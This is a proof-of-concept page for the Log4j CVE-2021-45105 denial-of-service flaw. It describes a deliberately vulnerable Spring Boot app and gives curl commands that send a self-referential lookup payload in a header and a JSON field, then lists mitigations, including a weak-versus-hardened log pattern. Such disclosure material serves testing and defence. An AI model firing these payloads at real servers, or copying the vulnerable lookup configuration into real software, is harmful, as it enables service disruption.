
CVE-2021-45105 PoC — Apache Log4j Security Vulnerability

Associated Vulnerability
Title: Apache Log4j Security Vulnerability (CVE-2021-45105)
Description: Apache Log4j is a Java-based open-source logging tool from the Apache Software Foundation (United States). Apache Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3) contain a security vulnerability caused by uncontrolled recursion from self-referential lookups. An attacker can exploit it to cause a denial of service when a crafted string is interpreted. The issue is fixed in 2.17.0 and 2.12.3.
Readme
# Sample Log4j2 vulnerable application (CVE-2021-45105)
# Versions Affected: all versions from 2.0-beta9 to 2.16.0

This application is a Spring Boot web application vulnerable to CVE-2021-45105.

It uses Log4j 2.16.0.

![](./screenshot.png)

## Running the application

Run it:

* Import the project into a Java IDE as a Maven project.
* Run CVEMainApplication.java as a Spring Boot application.

## Exploitation steps

* Trigger the exploit using:

```bash
# GET request: the payload is passed in the X-Api-Version header
curl 127.0.0.1:8080 -H 'X-Api-Version: ${${::-${::-$${::-$}}}}'

# POST request: the payload is passed in the clientRef JSON field
curl --location --request POST 'http://127.0.0.1:8080/addrecord' \
--header 'Content-Type: application/json' \
--data '{
	"clientRef": "${${::-${::-$${::-$}}}}"
}'
```


* Notice the output reporting an infinite loop. In testing, however, this DoS did not turn out to be resource-consuming: the program detects the infinite loop in property interpolation and errors out:

```
 ${ctx:apiVersion} ${ctx:clientRef}2021-12-18 14:29:56,759 http-nio-8080-exec-1 ERROR An exception occurred processing Appender Console java.lang.IllegalStateException: Infinite loop in property interpolation of ::-${::-$${::-j}}: :
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.checkCyclicSubstitution(StrSubstitutor.java:1081)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:1029)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:1042)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:912)
```

## Mitigation

Java 8 (or later) users should upgrade to release 2.17.0.

Alternatively, this can be mitigated in configuration:

* In the PatternLayout of the logging configuration, replace Context Lookups such as ${ctx:loginId} or $${ctx:loginId} with Thread Context Map patterns (%X, %mdc, or %MDC).
* Otherwise, remove from the configuration any references to Context Lookups such as ${ctx:loginId} or $${ctx:loginId} whose values originate from sources external to the application, such as HTTP headers or user input.
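As an added illustration of the configuration mitigation above (this is not the PoC's own log4j2.xml), the fragment below places the weak PatternLayout beside the hardened one. The `apiVersion` and `clientRef` context keys are the ones visible in the PoC output; the appender names and the rest of the pattern are assumptions.

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!-- Added example, not the project's own configuration. -->
<Configuration status="WARN">
  <Appenders>
    <!-- WEAK: the ${ctx:...} context lookups are resolved by StrSubstitutor,
         so a ThreadContext value taken from a request header or JSON field
         that itself contains lookup syntax is interpreted again. This is the
         recursion that the stack trace above (checkCyclicSubstitution) stops. -->
    <Console name="VulnerableConsole" target="SYSTEM_OUT">
      <PatternLayout pattern="%d %p %c{1.} [%t] ${ctx:apiVersion} ${ctx:clientRef} %m%n"/>
    </Console>

    <!-- HARDENED: %X{key} prints the Thread Context Map value as plain text
         and performs no lookup substitution on its content. -->
    <Console name="HardenedConsole" target="SYSTEM_OUT">
      <PatternLayout pattern="%d %p %c{1.} [%t] %X{apiVersion} %X{clientRef} %m%n"/>
    </Console>
  </Appenders>

  <Loggers>
    <!-- Only the hardened appender is wired in; the weak one is kept for comparison. -->
    <Root level="info">
      <AppenderRef ref="HardenedConsole"/>
    </Root>
  </Loggers>
</Configuration>
```

Switching the pattern to `%X{...}` keeps the same fields in the log line, so the change is a drop-in replacement for the lookup form; upgrading to 2.17.0 remains the primary fix, and the pattern change is the fallback where an immediate upgrade is not possible.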
File Snapshot

```
[4.0K] /data/pocs/3a3769e3e782ddcb8f998a2c7328770afdda541e
├── [1.3K] pom.xml
├── [2.0K] README.md
├── [ 31K] screenshot.png
└── [4.0K] src
    └── [4.0K] main
        ├── [4.0K] java
        │   └── [4.0K] com
        │       └── [4.0K] log4j
        │           └── [4.0K] cve
        │               ├── [ 308] CVEMainApplication.java
        │               ├── [ 221] InputRequest.java
        │               └── [1013] RestMainController.java
        └── [4.0K] resources
            └── [ 430] log4j2.xml

7 directories, 7 files
```